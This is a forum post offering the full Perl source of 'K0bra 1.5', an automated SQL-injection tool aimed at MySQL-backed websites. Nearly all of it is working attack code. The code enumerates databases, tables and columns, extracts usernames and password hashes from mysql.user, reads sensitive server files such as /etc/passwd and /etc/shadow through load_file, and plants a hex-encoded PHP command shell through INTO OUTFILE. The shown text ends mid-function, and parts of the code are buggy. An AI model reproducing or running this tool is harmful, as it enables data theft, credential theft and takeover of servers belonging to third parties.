Author Topic: [Perl] K0bra 1.5  (Read 1,981 times)
BigBear
[Perl] K0bra 1.5
« on: 1 December 2011, 22:14 »

The new version of my SQLi scanner.

The functions are the following:

  • Check for the vulnerability
  • Find the number of columns
  • Automatically find the column number that displays data
  • Show tables
  • Show columns
  • Show databases
  • Show tables of another DB
  • Show columns of a table in another DB
  • Show users from mysql.user
  • Search for files using load_file
  • Show a file using load_file
  • Show values
  • Show information about the DB
  • Create a shell using outfile
  • Everything is saved in sorted logs
Code
#!usr/bin/perl
#k0bra 1.5
#Console version
#Automatic SQL Scanner for MYSQL
#(c)0ded By Doddy H

system('cls');
system ("title k0bra");

my @files =('C:/xampp/htdocs/aca.txt','C:/xampp/htdocs/aca.txt','C:/xampp/htdocs/admin.php','C:/xampp/htdocs/leer.txt','../../../boot.ini','../../../../boot.ini','../../../../../boot.ini','../../../../../../boot.ini','/etc/passwd','/etc/shadow','/etc/shadow~','/etc/hosts','/etc/motd','/etc/apache/apache.conf','/etc/fstab','/etc/apache2/apache2.conf','/etc/apache/httpd.conf','/etc/httpd/conf/httpd.conf','/etc/apache2/httpd.conf','/etc/apache2/sites-available/default','/etc/mysql/my.cnf','/etc/my.cnf','/etc/sysconfig/network-scripts/ifcfg-eth0','/etc/redhat-release','/etc/httpd/conf.d/php.conf','/etc/pam.d/proftpd','/etc/phpmyadmin/config.inc.php','/var/www/config.php','/etc/httpd/logs/error_log','/etc/httpd/logs/error.log','/etc/httpd/logs/access_log','/etc/httpd/logs/access.log','/var/log/apache/error_log','/var/log/apache/error.log','/var/log/apache/access_log','/var/log/apache/access.log','/var/log/apache2/error_log','/var/log/apache2/error.log','/var/log/apache2/access_log','/var/log/apache2/access.log','/var/www/logs/error_log','/var/www/logs/error.log','/var/www/logs/access_log','/var/www/logs/access.log','/usr/local/apache/logs/error_log','/usr/local/apache/logs/error.log','/usr/local/apache/logs/access_log','/usr/local/apache/logs/access.log','/var/log/error_log','/var/log/error.log','/var/log/access_log','/var/log/access.log','/etc/group','/etc/security/group','/etc/security/passwd','/etc/security/user','/etc/security/environ','/etc/security/limits','/usr/lib/security/mkuser.default','/apache/logs/access.log','/apache/logs/error.log','/etc/httpd/logs/acces_log','/etc/httpd/logs/acces.log','/var/log/httpd/access_log','/var/log/httpd/error_log','/apache2/logs/error.log','/apache2/logs/access.log','/logs/error.log','/logs/access.log','/usr/local/apache2/logs/access_log','/usr/local/apache2/logs/access.log','/usr/local/apache2/logs/error_log','/usr/local/apache2/logs/error.log','/var/log/httpd/access.log','/var/log/httpd/error.log','/opt/lampp/logs/access_log','/opt/lampp/logs/error_log','/opt/xampp/logs/access_log','/opt/xampp/logs/error_log','/opt/lampp/logs/access.log','/opt/lampp/logs/error.log','/opt/xampp/logs/access.log','/opt/xampp/logs/error.log','C:\ProgramFiles\ApacheGroup\Apache\logs\access.log','C:\ProgramFiles\ApacheGroup\Apache\logs\error.log','/usr/local/apache/conf/httpd.conf','/usr/local/apache2/conf/httpd.conf','/etc/apache/conf/httpd.conf','/usr/local/etc/apache/conf/httpd.conf','/usr/local/apache/httpd.conf','/usr/local/apache2/httpd.conf','/usr/local/httpd/conf/httpd.conf','/usr/local/etc/apache2/conf/httpd.conf','/usr/local/etc/httpd/conf/httpd.conf','/usr/apache2/conf/httpd.conf','/usr/apache/conf/httpd.conf','/usr/local/apps/apache2/conf/httpd.conf','/usr/local/apps/apache/conf/httpd.conf','/etc/apache2/conf/httpd.conf','/etc/http/conf/httpd.conf','/etc/httpd/httpd.conf','/etc/http/httpd.conf','/etc/httpd.conf','/opt/apache/conf/httpd.conf','/opt/apache2/conf/httpd.conf','/var/www/conf/httpd.conf','/private/etc/httpd/httpd.conf','/private/etc/httpd/httpd.conf.default','/Volumes/webBackup/opt/apache2/conf/httpd.conf','/Volumes/webBackup/private/etc/httpd/httpd.conf','/Volumes/webBackup/private/etc/httpd/httpd.conf.default','C:\ProgramFiles\ApacheGroup\Apache\conf\httpd.conf','C:\ProgramFiles\ApacheGroup\Apache2\conf\httpd.conf','C:\ProgramFiles\xampp\apache\conf\httpd.conf','/usr/local/php/httpd.conf.php','/usr/local/php4/httpd.conf.php','/usr/local/php5/httpd.conf.php','/usr/local/php/httpd.conf','/usr/local/php4/httpd.conf','/usr/local/php5/httpd.conf','/Volumes/Macintosh_HD1/opt/httpd/conf/httpd.conf','/Volumes/Macintosh_HD1/opt/apache/conf/httpd.conf','/Volumes/Macintosh_HD1/opt/apache2/conf/httpd.conf','/Volumes/Macintosh_HD1/usr/local/php/httpd.conf.php','/Volumes/Macintosh_HD1/usr/local/php4/httpd.conf.php','/Volumes/Macintosh_HD1/usr/local/php5/httpd.conf.php','/usr/local/etc/apache/vhosts.conf','/etc/php.ini','/bin/php.ini','/etc/httpd/php.ini','/usr/lib/php.ini','/usr/lib/php/php.ini','/usr/local/etc/php.ini','/usr/local/lib/php.ini','/usr/local/php/lib/php.ini','/usr/local/php4/lib/php.ini','/usr/local/php5/lib/php.ini','/usr/local/apache/conf/php.ini','/etc/php4.4/fcgi/php.ini','/etc/php4/apache/php.ini','/etc/php4/apache2/php.ini','/etc/php5/apache/php.ini','/etc/php5/apache2/php.ini','/etc/php/php.ini','/etc/php/php4/php.ini','/etc/php/apache/php.ini','/etc/php/apache2/php.ini','/web/conf/php.ini','/usr/local/Zend/etc/php.ini','/opt/xampp/etc/php.ini','/var/local/www/conf/php.ini','/etc/php/cgi/php.ini','/etc/php4/cgi/php.ini','/etc/php5/cgi/php.ini','c:\php5\php.ini','c:\php4\php.ini','c:\php\php.ini','c:\PHP\php.ini','c:\WINDOWS\php.ini','c:\WINNT\php.ini','c:\apache\php\php.ini','c:\xampp\apache\bin\php.ini','c:\NetServer\bin\stable\apache\php.ini','c:\home2\bin\stable\apache\php.ini','c:\home\bin\stable\apache\php.ini','/Volumes/Macintosh_HD1/usr/local/php/lib/php.ini','/usr/local/cpanel/logs','/usr/local/cpanel/logs/stats_log','/usr/local/cpanel/logs/access_log','/usr/local/cpanel/logs/error_log','/usr/local/cpanel/logs/license_log','/usr/local/cpanel/logs/login_log','/var/cpanel/cpanel.config','/var/log/mysql/mysql-bin.log','/var/log/mysql.log','/var/log/mysqlderror.log','/var/log/mysql/mysql.log','/var/log/mysql/mysql-slow.log','/var/mysql.log','/var/lib/mysql/my.cnf','C:\ProgramFiles\MySQL\MySQLServer5.0\data\hostname.err','C:\ProgramFiles\MySQL\MySQLServer5.0\data\mysql.log','C:\ProgramFiles\MySQL\MySQLServer5.0\data\mysql.err','C:\ProgramFiles\MySQL\MySQLServer5.0\data\mysql-bin.log','C:\ProgramFiles\MySQL\data\hostname.err','C:\ProgramFiles\MySQL\data\mysql.log','C:\ProgramFiles\MySQL\data\mysql.err','C:\ProgramFiles\MySQL\data\mysql-bin.log','C:\MySQL\data\hostname.err','C:\MySQL\data\mysql.log','C:\MySQL\data\mysql.err','C:\MySQL\data\mysql-bin.log','C:\ProgramFiles\MySQL\MySQLServer5.0\my.ini','C:\ProgramFiles\MySQL\MySQLServer5.0\my.cnf','C:\ProgramFiles\MySQL\my.ini','C:\ProgramFiles\MySQL\my.cnf','C:\MySQL\my.ini','C:\MySQL\my.cnf','/etc/logrotate.d/proftpd','/www/logs/proftpd.system.log','/var/log/proftpd','/etc/proftp.conf','/etc/protpd/proftpd.conf','/etc/vhcs2/proftpd/proftpd.conf','/etc/proftpd/modules.conf','/var/log/vsftpd.log','/etc/vsftpd.chroot_list','/etc/logrotate.d/vsftpd.log','/etc/vsftpd/vsftpd.conf','/etc/vsftpd.conf','/etc/chrootUsers','/var/log/xferlog','/var/adm/log/xferlog','/etc/wu-ftpd/ftpaccess','/etc/wu-ftpd/ftphosts','/etc/wu-ftpd/ftpusers','/usr/sbin/pure-config.pl','/usr/etc/pure-ftpd.conf','/etc/pure-ftpd/pure-ftpd.conf','/usr/local/etc/pure-ftpd.conf','/usr/local/etc/pureftpd.pdb','/usr/local/pureftpd/etc/pureftpd.pdb','/usr/local/pureftpd/sbin/pure-config.pl','/usr/local/pureftpd/etc/pure-ftpd.conf','/etc/pure-ftpd/pure-ftpd.pdb','/etc/pureftpd.pdb','/etc/pureftpd.passwd','/etc/pure-ftpd/pureftpd.pdb','/var/log/pure-ftpd/pure-ftpd.log','/logs/pure-ftpd.log','/var/log/pureftpd.log','/var/log/ftp-proxy/ftp-proxy.log','/var/log/ftp-proxy','/var/log/ftplog','/etc/logrotate.d/ftp','/etc/ftpchroot','/etc/ftphosts','/var/log/exim_mainlog','/var/log/exim/mainlog','/var/log/maillog','/var/log/exim_paniclog','/var/log/exim/paniclog','/var/log/exim/rejectlog','/var/log/exim_rejectlog');

use LWP::UserAgent;
use URI::Split qw(uri_split);

installer();

my $nave = LWP::UserAgent->new();
$nave->timeout(5);
$nave->agent("Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8.1.12) Gecko/20080201Firefox/2.0.0.12");

&head;
unless(@ARGV == 2) {
&menu;
} else {
&scan($ARGV[0],$ARVG[1]);
}
&finish;

sub menu {
print "[Page] : ";
chomp(my $page=<STDIN>);
print "\n[Bypass : -- /* %20] : ";
chomp(my $bypass = <STDIN>);
print "\n\n";
&scan($page,$bypass);
}

sub scan {
my $page = $_[0];
print "[Status] : Scanning.....\n";
($pass1,$bypass2) = &bypass($_[1]);
my ($scheme, $auth, $path, $query, $frag)  = uri_split($_[0]);
my $save = $auth;

if ($_[0]=~/hackman/ig) {
savefile($save.".txt","\n[Target Confirmed] : $_[0]\n");
&menu_options($_[0],$pass,$save);
}

my $testar1 = toma($page.$pass1."and".$pass1."1=0".$pass2);
my $testar2 = toma($page.$pass1."and".$pass1."1=1".$pass2);

unless ($testar1 eq $testar2) {
motor($page,$_[1]);
} else {
print "\n[-] Not vulnerable\n\n";
print "[+] Scan anyway y/n : ";
chomp(my $op = <stdin>);
if ($op eq "y") {
motor($page,$_[1]);
} else {
head();
menu();
}
}

}

sub motor {

my ($gen,$save,$control) = &length($_[0],$_[1]);

if ($control eq 1) {
print "[Status] : Enjoy the menu\n\n";
&menu_options($gen,$pass,$save);
} else {
print "[Status] : Length columns not found\n\n";
<STDIN>;
&head;
&menu;
}
}

sub head {
system 'cls';


@      @@   @            
@@     @  @ @@            
@ @@  @  @  @ @   @ @ @@@
@ @   @  @  @@ @ @@@ @  @
@@    @  @  @  @  @   @@@
@ @   @  @  @  @  @  @  @
@@@ @   @@   @@@  @@@ @@@@@




);
}

sub length {
print "\n[+] Looking for the number of columns\n\n";
my $rows  = "0";
my $asc;
my $page = $_[0];
($pass1,$pass2) = &bypass($_[1]);

$alert = "char(".ascii("RATSXPDOWN1RATSXPDOWN").")";
$total = "1";
for my $rows(2..200) {
$asc.= ","."char(".ascii("RATSXPDOWN".$rows."RATSXPDOWN").")";
$total.= ",".$rows;
$injection = $page."1".$pass1."and".$pass1."1=0".$pass1."union".$pass1."select".$pass1.$alert.$asc;
$test = toma($injection);
if ($test=~/RATSXPDOWN/) {
@number = $test =~m{RATSXPDOWN(\d+)RATSXPDOWN}g;
$control = 1;
my ($scheme, $auth, $path, $query, $frag)  = uri_split($_[0]);
my $save = $auth;
savefile($save.".txt","\n[Target confirmed] : $page");
savefile($save.".txt","[Bypass] : $_[1]\n");
savefile($save.".txt","[Limit] : The site has $rows columns");
savefile($save.".txt","[Data] : The number @number print data");
$total=~s/$number[0]/hackman/;
savefile($save.".txt","[SQLI] : ".$page."1".$pass1."and".$pass1."1=0".$pass1."union".$pass1."select".$pass1.$total);
return($page."1".$pass1."and".$pass1."1=0".$pass1."union".$pass1."select".$pass1.$total,$save,$control);
}
}
}

sub details {
my ($page,$bypass,$save) = @_;
($pass1,$pass2) = &bypass($bypass);
savefile($save.".txt","\n");
if ($page=~/(.*)hackman(.*)/ig) {
print "[+] Searching information..\n\n";
my  ($start,$end) = ($1,$2);
$inforschema = $start."unhex(hex(concat(char(69,82,84,79,82,56,53,52))))".$end.$pass1."from".$pass1."information_schema.tables".$pass2;
$mysqluser = $start."unhex(hex(concat(char(69,82,84,79,82,56,53,52))))".$end.$pass1."from".$pass1."mysql.user".$pass2;
$test3 = toma($start."unhex(hex(concat(char(69,82,84,79,82,56,53,52),load_file(0x2f6574632f706173737764))))".$end.$pass2);
$test1 = toma($inforschema);
$test2 = toma($mysqluser);
if ($test2=~/ERTOR854/ig) {
savefile($save.".txt","[mysql.user] : ON");
print "[mysql.user] : ON\n";
} else {
print "[mysql.user] : OFF\n";
savefile($save.".txt","[mysql.user] : OFF");
}
if ($test1=~/ERTOR854/ig) {
print "[information_schema.tables] : ON\n";
savefile($save.".txt","[information_schema.tables] : ON");
} else {
print "[information_schema.tables] : OFF\n";
savefile($save.".txt","[information_schema.tables] : OFF");
}
if ($test3=~/ERTOR854/ig) {
print "[load_file] : ON\n";
savefile($save.".txt","[load_file] : ".$start."unhex(hex(concat(char(69,82,84,79,82,56,53,52),load_file(0x2f6574632f706173737764))))".$end.$pass2);
}
$concat = "unhex(hex(concat(char(69,82,84,79,82,56,53,52),version(),char(69,82,84,79,82,56,53,52),database(),char(69,82,84,79,82,56,53,52),user(),char(69,82,84,79,82,56,53,52))))";
$injection = $start.$concat.$end.$pass2;
$code = toma($injection);
if ($code=~/ERTOR854(.*)ERTOR854(.*)ERTOR854(.*)ERTOR854/g) {
print "\n[!] DB Version : $1\n[!] DB Name : $2\n[!] user_name : $3\n\n";
savefile($save.".txt","\n[!] DB Version : $1\n[!] DB Name : $2\n[!] user_name : $3\n");
} else {
print "\n[-] Not found any data\n";
}
}
}

sub menu_options {

head();

print "[Target confirmed] : $_[0]\n";
print "[Bypass] : $_[1]\n\n";

my ($scheme, $auth, $path, $query, $frag)  = uri_split($_[0]);
my $save = $auth;
print "[save] : /logs/webs/$save\n\n";
print "\n--== information_schema.tables ==--\n\n";
print "[1] : Show tables\n";
print "[2] : Show columns\n";
print "[3] : Show DBS\n";
print "[4] : Show tables with other DB\n";
print "[5] : Show columns with other DB\n";
print "\n\n--== mysql.user ==--\n\n";
print "[6] : Show users\n";
print "\n--== Others ==--\n\n";
print "[7] : Fuzzing files with load_file\n";
print "[8] : Read a file with load_file\n";
print "[9] : Dump\n";
print "[10] : Informacion of the server\n";
print "[11] : Create a shell with into outfile\n";
print "[12] : Show Log\n";
print "[13] : Change Target\n";
print "[14] : Exit\n";
print "\n\n[Option] : ";
chomp(my $opcion = <STDIN>);
if ($opcion eq "1") {
schematables($_[0],$_[1],$save);
&reload;
}
elsif ($opcion eq "2") {
print "\n\n[Table] : ";
chomp(my $tabla = <STDIN>);
schemacolumns($_[0],$_[1],$save,$tabla);
&reload;
}
elsif ($opcion eq "3") {
&schemadb($_[0],$_[1],$save);
&reload;
}
elsif ($opcion eq "4") {
print "\n\n[DAtabase] : ";
chomp(my $data =<STDIN>);
&schematablesdb($_[0],$_[1],$data,$save);
&reload;
}
elsif ($opcion eq "5"){
print "\n\n[DB] : ";
chomp(my $db =<STDIN>);
print "\n[Table] : ";
chomp(my $table =<STDIN>);
&schemacolumnsdb($_[0],$_[1],$db,$table,$save);
&reload;
}
elsif ($opcion eq "6") {
&mysqluser($_[0],$_[1],$save);
&reload;
}
elsif ($opcion eq "7") {
&load($_[0],$_[1],$save);
&reload;
}
elsif ($opcion eq "8") { ########################################
&loadfile($_[0],$_[1],$save);
&reload;
}
elsif ($opcion eq "9") {
print "\n\n[Table to dump] : ";
chomp(my $tabla = <STDIN>);
print "\n[Column 1] : ";
chomp(my $col1 = <STDIN>);
print "\n[Column 2] : ";
chomp(my $col2 = <STDIN>);
print "\n\n";
&dump($_[0],$col1,$col2,$tabla,$_[1],$save);
&reload;
}
elsif ($opcion eq "10") {
print "\n\n";
&details($_[0],$_[1],$save);
&reload;
}
elsif ($opcion eq "11") {
print "\n\n[Full Path Discloure] : ";
chomp(my $path = <STDIN>);
&into($_[0],$_[1],$path,$save);
&reload;
}
elsif ($opcion eq "12") {
$t = "logs/webs/$save.txt";
system("start $t");
&reload;
}
elsif ($opcion eq "13") {
&head;
&menu;
}

elsif ($opcion eq "14") {
&finish;
}
else {
&reload;
}
}

sub schematables {

$real = "1";
my ($page,$bypass,$save) = @_;
savefile($save.".txt","\n");
print "\n";
my $page1 = $page;
($pass1,$pass2) = &bypass($_[1]);
savefile($save.".txt","[DB] : default");
print "\n[+] Searching tables with schema\n\n";
$page =~s/hackman/unhex(hex(concat(char(82,65,84,83,88,80,68,79,87,78,49),table_name,char(82,65,84,83,88,80,68,79,87,78,49))))/;
$page1=~s/hackman/unhex(hex(concat(char(82,65,84,83,88,80,68,79,87,78,49),Count(*),char(82,65,84,83,88,80,68,79,87,78,49))))/;
$code = toma($page1.$pass1."from".$pass1."information_schema.tables".$pass2);
if ($code=~/RATSXPDOWN1(.*)RATSXPDOWN1/ig) {
my $resto = $1;
$total = $resto - 17;
print "[+] Tables Length :  $total\n\n";
savefile($save.".txt","[+] Searching tables with schema\n");
savefile($save.".txt","[+] Tables Length :  $total\n");
my $limit = $1;
for my $limit(17..$limit) {
$code1 = toma($page.$pass1."from".$pass1."information_schema.tables".$pass1."limit".$pass1.$limit.",1".$pass2);
if ($code1 =~/RATSXPDOWN1(.*)RATSXPDOWN1/ig) {
my $table = $1;
chomp $table;
print "[Table $real Found : $table ]\n";
savefile($save.".txt","[Table $real Found : $table ]");
$real++;
}}
} else {
print "\n[-] information_schema = ERROR\n";
}
}
sub reload {
print "\n\n[+] Finish\n\n";
<STDIN>;
&head;
&menu_options;
}


sub schemacolumns {
my ($page,$bypass,$save,$table) = @_;
my $page3 = $page;
my $page4 = $page;
savefile($save.".txt","\n");
print "\n";
($pass1,$pass2) = &bypass($bypass);
print "\n[DB] : default\n";
savefile($save.".txt","[DB] : default");
savefile($save.".txt","[Table] : $table\n");
$page3=~s/hackman/unhex(hex(concat(char(82,65,84,83,88,80,68,79,87,78,49),Count(*),char(82,65,84,83,88,80,68,79,87,78,49))))/;
$code3 = toma($page3.$pass1."from".$pass1."information_schema.columns".$pass1."where".$pass1."table_name=char(".ascii($table).")".$pass2);
if ($code3=~/RATSXPDOWN1(.*)RATSXPDOWN1/ig) {
print "\n[Columns Length : $1 ]\n\n";
savefile($save.".txt","[Columns Length : $1 ]\n");
my $si = $1;
chomp $si;
$page4=~s/hackman/unhex(hex(concat(char(82,65,84,83,88,80,68,79,87,78,49),column_name,char(82,65,84,83,88,80,68,79,87,78,49))))/;
$real = "1";
for my $limit2(0..$si) {
$code4 = toma($page4.$pass1."from".$pass1."information_schema.columns".$pass1."where".$pass1."table_name=char(".ascii($table).")".$pass1."limit".$pass1.$limit2.",1".$pass2);
if ($code4=~/RATSXPDOWN1(.*)RATSXPDOWN1/ig) {
print "[Column $real] : $1\n";
savefile($save.".txt","[Column $real] : $1");
$real++;
}}
} else {
print "\n[-] information_schema = ERROR\n";
}}

sub schemadb {
my ($page,$bypass,$save) = @_;
my $page1 = $page;
savefile($save.".txt","\n");
print "\n\n[+] Searching DBS\n\n";
($pass1,$pass2) = &bypass($bypass);
$page=~s/hackman/unhex(hex(concat(char(82,65,84,83,88,80,68,79,87,78,49),Count(*),char(82,65,84,83,88,80,68,79,87,78,49))))/;
$code = toma($page.$pass1."from".$pass1."information_schema.schemata");
if ($code=~/RATSXPDOWN1(.*)RATSXPDOWN1/ig) {
my $limita = $1;
print "[+] Databases Length : $limita\n\n";
savefile($save.".txt","[+] Databases Length : $limita\n");
$page1=~s/hackman/unhex(hex(concat(char(82,65,84,83,88,80,68,79,87,78,49),schema_name,char(82,65,84,83,88,80,68,79,87,78,49))))/;
$real = "1";
for my $limit(0..$limita) {
$code = toma($page1.$pass1."from".$pass1."information_schema.schemata".$pass1."limit".$pass1.$limit.",1".$pass2);
if ($code=~/RATSXPDOWN1(.*)RATSXPDOWN1/ig) {
my $control = $1;
if ($control ne "information_schema" and $control ne "mysql" and $control ne "phpmyadmin") {
print "[Database $real Found] $control\n";
savefile($save.".txt","[Database $real Found] : $control");
$real++;
}
}
}
} else {
print "[-] information_schema = ERROR\n";
}
}

sub schematablesdb {
my $page = $_[0];
my $db = $_[2];
my $page1 = $page;
savefile($_[3].".txt","\n");
print "\n\n[+] Searching tables with DB $db\n\n";
($pass1,$pass2) = &bypass($_[1]);
savefile($_[3].".txt","[DB] : $db");
$page =~s/hackman/unhex(hex(concat(char(82,65,84,83,88,80,68,79,87,78,49),table_name,char(82,65,84,83,88,80,68,79,87,78,49))))/;
$page1=~s/hackman/unhex(hex(concat(char(82,65,84,83,88,80,68,79,87,78,49),Count(*),char(82,65,84,83,88,80,68,79,87,78,49))))/;
$code = toma($page1.$pass1."from".$pass1."information_schema.tables".$pass1."where".$pass1."table_schema=char(".ascii($db).")".$pass2);
#print $page.$pass1."from".$pass1."information_schema.tables".$pass1."where".$pass1."table_schema=char(".ascii($db).")".$pass2."\n";
if ($code=~/RATSXPDOWN1(.*)RATSXPDOWN1/ig) {  
print "[+] Tables Length :  $1\n\n";
savefile($_[3].".txt","[+] Tables Length :  $1\n");
my $limit = $1;
$real = "1";
for my $lim(0..$limit) {
$code1 = toma($page.$pass1."from".$pass1."information_schema.tables".$pass1."where".$pass1."table_schema=char(".ascii($db).")".$pass1."limit".$pass1.$lim.",1".$pass2);
#print $page.$pass1."from".$pass1."information_schema.tables".$pass1."where".$pass1."table_schema=char(".ascii($db).")".$pass1."limit".$pass1.$lim.",1".$pass2."\n";
if ($code1 =~/RATSXPDOWN1(.*)RATSXPDOWN1/ig) {
my $table = $1;
chomp $table;
savefile($_[3].".txt","[Table $real Found : $table ]");
print "[Table $real Found : $table ]\n";
$real++;
}}
} else {
print "\n[-] information_schema = ERROR\n";
}}

sub schemacolumnsdb {
my ($page,$bypass,$db,$table,$save) = @_;
my $page3 = $page;
my $page4 = $page;
print "\n\n[+] Searching columns in table $table with DB $db\n\n";
savefile($save.".txt","\n");
($pass1,$pass2) = &bypass($_[1]);
savefile($save.".txt","\n[DB] : $db");
savefile($save.".txt","[Table] : $table");
$page3=~s/hackman/unhex(hex(concat(char(82,65,84,83,88,80,68,79,87,78,49),Count(*),char(82,65,84,83,88,80,68,79,87,78,49))))/;
$code3 = toma($page3.$pass1."from".$pass1."information_schema.columns".$pass1."where".$pass1."table_name=char(".ascii($table).")".$pass1."and".$pass1."table_schema=char(".ascii($db).")".$pass2);
if ($code3=~/RATSXPDOWN1(.*)RATSXPDOWN1/ig) {
print "\n[Columns length : $1 ]\n\n";
savefile($save.".txt","[Columns length : $1 ]\n");
my $si = $1;
chomp $si;
$page4=~s/hackman/unhex(hex(concat(char(82,65,84,83,88,80,68,79,87,78,49),column_name,char(82,65,84,83,88,80,68,79,87,78,49))))/;
$real = "1";
for my $limit2(0..$si) {
$code4 = toma($page4.$pass1."from".$pass1."information_schema.columns".$pass1."where".$pass1."table_name=char(".ascii($table).")".$pass1."and".$pass1."table_schema=char(".ascii($db).")".$pass1."limit".$pass1.$limit2.",1".$pass2);
if ($code4=~/RATSXPDOWN1(.*)RATSXPDOWN1/ig) {
print "[Column $real] : $1\n";
savefile($save.".txt","[Column $real] : $1");
$real++;
}
}
} else {
print "\n[-] information_schema = ERROR\n";
}
}

sub mysqluser {
my ($page,$bypass,$save) = @_;
my $cop = $page;
my $cop1 = $page;
savefile($save.".txt","\n");
print "\n\n[+] Finding mysql.users\n";
($pass1,$pass2) = &bypass($bypass);
$page =~s/hackman/concat(char(82,65,84,83,88,80,68,79,87,78,49))/;
$code = toma($page.$pass1."from".$pass1."mysql.user".$pass2);
if ($code=~/RATSXPDOWN/ig){
$cop1 =~s/hackman/unhex(hex(concat(char(82,65,84,83,88,80,68,79,87,78,49),Count(*),char(82,65,84,83,88,80,68,79,87,78,49))))/;
$code1 = toma($cop1.$pass1."from".$pass1."mysql.user".$pass2);
if ($code1=~/RATSXPDOWN1(.*)RATSXPDOWN1/ig) {
print "\n\n[+] Users Found : $1\n\n";
savefile($save.".txt","\n[+] Users mysql Found : $1\n");
for my $limit(0..$1) {
$cop =~s/hackman/unhex(hex(concat(0x524154535850444f574e,Host,0x524154535850444f574e,User,0x524154535850444f574e,Password,0x524154535850444f574e)))/;
$code = toma($cop.$pass1."from".$pass1."mysql.user".$pass1."limit".$pass1.$limit.",1".$pass2);
if ($code=~/RATSXPDOWN(.*)RATSXPDOWN(.*)RATSXPDOWN(.*)RATSXPDOWN/ig) {
print "[Host] : $1 [User] : $2 [Password] : $3\n";
savefile($save.".txt","[Host] : $1 [User] : $2 [Password] : $3");
} else {
&reload;
}
}
}
} else {
print "\n[-] mysql.user = ERROR\n";
}
}

sub tabfuzz {
my $page = $_[0];
($pass1,$pass2) = &bypass($_[1]);
$count = "0";
savefile($_[2].".txt","\n");
print "\n";
if ($_[0] =~/(.*)hackman(.*)/g) {
my $start = $1; my $end = $2;
print "\n\n[+] Searching tables.....\n\n";
for my $table(@buscar2) {
chomp $table;
$concat = "unhex(hex(concat(char(69,82,84,79,82,56,53,52))))";
$injection = $start.$concat.$end.$pass1."from".$pass1.$table.$pass2;
$code = toma($injection);
if ($code =~/ERTOR854/g) {
$count++;
print "[Table Found] : $table\n";
savefile($_[2].".txt","[Table Found] : $table");
}}}
if ($count eq "0") { print "[-] Not found any table\n";
&reload;
}
}

sub colfuzz {
my $page = $_[0];
($pass1,$pass2) = &bypass($_[1]);
$count = "0";
savefile($_[3].".txt","\n");
print "\n";
if ($_[0] =~/(.*)hackman(.*)/) {
my $start = $1; my $end = $2;
print "[+] Searching columns for the table $_[2]...\n\n";
savefile($_[3].".txt","[Table] : $_[2]");
for my $columns(@buscar1) {
chomp $columns;
$concat = "unhex(hex(concat(char(69,82,84,79,82,56,53,52),$columns,char(69,82,84,79,82,56,53,52))))";
$code = toma($start.$concat.$end.$pass1."from".$pass1.$_[2].$pass2);
if ($code =~/ERTOR854/g) {
print "[Column] : $columns\n";
savefile($_[3].".txt","[Column Found] : $columns");
}
}
} else {
print "\n[Example] : $0 http://127.0.0.1/tester/sql.php?id=-1+union+select+hackman,2,3 hackers\n\n"; &copyright;
}
}

sub load {
savefile($_[2].".txt","\n");
print "\n";
($pass1,$pass2) = &bypass($_[1]);
if ($_[0] =~/(.*)hackman(.*)/g) {
print "\n[+] Searching files with load_file...\n\n\n";
my $start = $1; my $end = $2;
for my $file(@files) {
chomp $file;
$concat = "unhex(hex(concat(char(107,48,98,114,97),load_file(".encode($file)."),char(107,48,98,114,97))))";
my $code = toma($start.$concat.$end.$pass2);
chomp $code;
if ($code=~/k0bra(.*)k0bra/s) {
print "[File Found] : $file\n";
print "\n[Source Start]\n\n";
print $1;
print "\n\n[Source End]\n\n";
savefile($_[2].".txt","[File Found] : $file");
savefile($_[2].".txt","\n[Source Start]\n");
savefile($_[2].".txt","$1");
savefile($_[2].".txt","\n[Source End]\n");
}}}}

sub loadfile {
savefile($_[2].".txt","\n");
($pass1,$pass2) = &bypass($_[1]);
if ($_[0] =~/(.*)hackman(.*)/g) {
my $start = $1; my $end = $2;
print "\n\n[+] File to read : ";
chomp (my $file = <stdin>);
$concat = "unhex(hex(concat(char(107,48,98,114,97),load_file(".encode($file)."),char(107,48,98,114,97))))";
my $code = toma($start.$concat.$end.$pass2);
chomp $code;
if ($code=~/k0bra(.*)k0bra/s) {
print "[File Found] : $file\n";
print "\n[Source Start]\n\n";
print $1;
print "\n\n[Source End]\n\n";
savefile($_[2].".txt","[File Found] : $file");
savefile($_[2].".txt","\n[Source Start]\n");
savefile($_[2].".txt","$1");
savefile($_[2].".txt","\n[Source End]\n");
}}}

sub dump {
savefile($_[5].".txt","\n");
print "\n";
my $page = $_[0];
($pass1,$pass2) = &bypass($_[4]);
if ($page=~/(.*)hackman(.*)/){
my $start = $1;
my $end = $2;
print "[+] Extracting values...\n\n";
$concatx = "unhex(hex(concat(char(69,82,84,79,82,56,53,52),count($_[1]),char(69,82,84,79,82,56,53,52))))";
$val_code = toma($start.$concatx.$end.$pass1."from".$pass1.$_[3].$pass2);
$concat = "unhex(hex(concat(char(69,82,84,79,82,56,53,52),$_[1],char(69,82,84,79,82,56,53,52),$_[2],char(69,82,84,79,82,56,53,52))))";
if ($val_code=~/ERTOR854(.*)ERTOR854/ig) {
$tota = $1;
print "[+] Table : $_[3]\n";
print "[+] Length of the rows : $tota\n\n";
print "[$_[1]] [$_[2]]\n\n";
savefile($_[5].".txt","[Table] : $_[3]");
savefile($_[5].".txt","[+] Length of the rows: $tota\n");
savefile($_[5].".txt","[$_[1]] [$_[2]]\n");
for my $limit(0..$tota) {
chomp $limit;
$injection = toma($start.$concat.$end.$pass1."from".$pass1.$_[3].$pass1."limit".$pass1.$limit.",1".$pass2);
if ($injection=~/ERTOR854(.*)ERTOR854(.*)ERTOR854/ig) {
savefile($_[5].".txt","[$_[1]] : $1   [$_[2]] : $2");
print "[$_[1]] : $1   [$_[2]] : $2\n";
} else {
print "\n\n[+] Extracting Finish\n";
&reload;
}
}
} else {
print "[-] Not Found any DATA\n\n";
}}}


sub into {
print "\n\n[Status] : Injecting a SQLI for create a shell\n\n";
my ($page,$bypass,$dir,$save) = @_;
savefile($save.".txt","\n");
print "\n";
($pass1,$pass2) = &bypass($bypass);
my ($scheme, $auth, $path, $query, $frag)  = uri_split($page);
if ($path=~/\/(.*)$/) {
my $path1 = $1;
my $path2 = $path1;
$path2 =~s/$1//;
$dir =~s/$path1//ig;
$shell = $dir."/"."shell.php";
if ($page =~/(.*)hackman(.*)/ig) {
my  ($start,$end) = ($1,$2);
$code = toma($start."0x3c7469746c653e4d696e69205368656c6c20427920446f6464793c2f7469746c653e3c3f7068702069662028697373657428245f4745545b27636d64275d2929207b2073797374656d28245f4745545b27636d64275d293b7d3f3e".$end.$pass1."into".$pass1."outfile".$pass1."'".$shell."'".$pass2);
